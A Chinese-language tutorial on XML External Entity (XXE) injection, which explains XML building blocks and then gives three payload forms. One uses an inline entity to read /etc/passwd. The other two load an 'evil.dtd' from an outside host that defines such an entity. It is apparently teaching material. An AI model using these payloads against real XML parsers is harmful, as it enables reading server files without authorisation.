XML實體注入？
為什麼稱為XML實體注入=XXE了？

首先，要了解xml文件的構建模組

所有的 XML 文件（以及 HTML 文件）均由以下簡單的構建模組構成：元素、屬性、實體、PCDATA、CDATA
簡單對這幾個模組解釋

1，元素

元素是 XML 以及 HTML 文件的主要構建模組，元素可包含文字、其他元素或者是空的。

例項:

<body>body text in between</body>
<message>some message in between</message>

空的 HTML 元素的例子是 “hr”、“br” 以及 “img”。

2，屬性

屬性可提供有關元素的額外資訊

例項：

<img src="computer.gif" />

3，實體

實體是用來定義普通文字的變數。實體引用是對實體的引用。—那麼這裡就是關於XML實體注入的關鍵點了

4，PCDATA

PCDATA 的意思是被解析的字元資料（parsed character data）。

PCDATA 是會被解析器解析的文字。這些文字將被解析器檢查實體以及標記。

5，CDATA

CDATA 的意思是字元資料（character data）。

CDATA 是不會被解析器解析的文字。

從上面可以找到，實體是用來定義普通文字的變數，實體引用是對實體的引用，XML實體注入就是對實體模組中的內容插入的一種注入

XXE的攻擊與危害（XML External Entity）

1，何為XXE?

答： xxe也就是xml外部實體注入。

2，怎樣構建外部實體注入？

方式一：直接通過DTD外部實體宣告

XML內容

<?xml version="1.0"?>
<!DOCTYPE a [
	<!ENTITY b SYSTEM "file:///etc/passwd">
]>
<c>&b;</c>

方式二：通過DTD文件引入外部DTD文件，再引入外部實體宣告

<?xml version="1.0"?>
<!DOCTYPE a SYSTEM "http://mark4z5.com/evil.dtd">
<c>&b;</c>

DTD檔案內容

<!ENTITY b SYSTEM "file:///etc/passwd">
 

方式三：通過DTD外部實體宣告引入外部實體宣告

好像有點拗口，其實意思就是先寫一個外部實體宣告，然後引用的是在攻擊者伺服器上面的外部實體宣告

具體看例子,XML內容

<?xml version="1.0"?>
<!DOCTYPE a [
	<!ENTITY  %  d SYSTEM "http://mark4z5.com/evil.dtd">
	%d;
]>
<c>&b;</c>

dtd檔案內容

<!ENTITY b SYSTEM "file://etc/passwd">

3，支援的協議有哪些？
不同程式支援的協議如下圖

相關推薦